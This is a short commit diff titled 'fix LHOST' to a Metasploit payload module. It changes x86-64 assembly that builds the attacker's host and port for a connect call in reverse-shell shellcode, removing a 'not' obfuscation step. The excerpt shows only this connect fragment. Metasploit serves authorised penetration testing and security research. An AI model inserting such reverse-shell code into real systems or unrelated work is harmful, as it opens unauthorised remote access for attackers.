fix LHOST
parent
e225e29add
commit
cf893c2962
|
@ -73,8 +73,7 @@ module MetasploitModule
|
||||||
|
|
||||||
; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16);
|
; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16);
|
||||||
mov rdi, rax
|
mov rdi, rax
|
||||||
mov rax, ~0x#{encoded_host}#{encoded_port}
|
mov rax, 0x#{encoded_host}#{encoded_port}
|
||||||
not rax
|
|
||||||
push rax
|
push rax
|
||||||
push rsp
|
push rsp
|
||||||
pop rsi
|
pop rsi
|
||||||
|
|
Loading…
Reference in New Issue